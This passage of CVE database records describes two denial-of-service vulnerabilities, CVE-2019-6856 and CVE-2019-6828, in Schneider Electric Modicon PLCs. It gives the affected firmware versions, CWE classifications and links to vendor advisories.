},
{
"version_value": "Modicon Quantum"
},
{
"version_value": "Modicon Premium (see security notification for specific versions)"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when writing specific physical memory blocks using Modbus TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01",
"refsource": "CONFIRM",
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"name": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01",
"refsource": "MISC",
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6856",
"datePublished": "2020-01-06T22:57:02.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:37:57.750Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-6828 (GCVE-0-2019-6828)
Vulnerability from cvelistv5 – Published: 2019-09-17 19:59 – Updated: 2024-08-04 20:31- CWE-248 - Uncaught Exception
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580 |
Affected:
firmware version prior to V2.90
|
|
| Schneider Electric SE | Modicon M340 |
Affected:
firmware version prior to V3.10
|
|
| Schneider Electric SE | Modicon Premium |
Affected:
all versions
|
|
| Schneider Electric SE | Modicon Quantum |
Affected:
all versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.247Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V2.90"
}
]
},
{
"product": "Modicon M340",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V3.10"
}
]
},
{
"product": "Modicon Premium",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions"
}
]
},
{
"product": "Modicon Quantum",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-248: Uncaught Exception vulnerability exists Modicon M580 (firmware version prior to V2.90), Modicon M340 (firmware version prior to V3.10), Modicon Premium (all versions), and Modicon Quantum (all versions), which could cause a possible denial of service when reading specific coils and registers in the controller over Modbus."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-248",
"description": "CWE-248: Uncaught Exception",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:59:33.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6828",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V2.90"
}
]
}
},
{
"product_name": "Modicon M340",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V3.10"
}
]
}
},
{
"product_name": "Modicon Premium",
"version": {
"version_data": [
{
"version_value": "all versions"
}
]
}
},
{
"product_name": "Modicon Quantum",
"version": {
"version_data": [
{
"version_value": "all versions"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-248: Uncaught Exception vulnerability exists Modicon M580 (firmware version prior to V2.90), Modicon M340 (firmware version prior to V3.10), Modicon Premium (all versions), and Modicon Quantum (all versions), which could cause a possible denial of service when reading specific coils and registers in the controller over Modbus."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-248: Uncaught Exception"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6828",
"datePublished": "2019-09-17T19:59:33.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.247Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}